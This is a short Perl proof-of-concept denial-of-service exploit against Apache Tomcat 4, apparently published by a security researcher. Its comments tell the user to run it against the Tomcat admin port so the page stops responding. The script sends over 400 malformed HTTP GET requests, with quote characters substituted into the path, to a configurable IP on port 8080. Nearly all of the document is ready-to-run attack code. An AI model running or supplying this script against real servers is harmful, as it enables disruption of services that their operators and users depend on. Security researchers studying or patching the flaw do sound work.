#!/usr/bin/perl # # PoC - DoS Exploit for Apache Tomcat 4 # by Oliver Karow - oliver.karowNOSPAM__AT__gmx.de # http://www.oliverkarow.de/research/tomcat_crash.txt # # Run this script against the Tomcat Admin Port. After execution, the page will not be accessible any more. # The port is still open and accepting connections, but not responding with content. To verify, connect with your browser # to the port. # use IO::Socket; $ip=""; $port="8080"; $counter =0; @attackpattern=("'"); for ($x=0;$x<=400;$x++){ $headerLine="GET /dummy/dontexist.pl? HTTP/1.0\n\n"; @temp=split(/(\/)/,$headerLine); foreach (@temp){ $replaceme=$_; foreach(@attackpattern){ $attack=$_; $newheaderline=$headerLine; $newheaderline=~ s/$replaceme/$attack/i; $remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection not possible\n"; print $remote $newheaderline; print "\nRequest: ".$counter++." \t".$newheaderline."\n"; $remote->close; } } }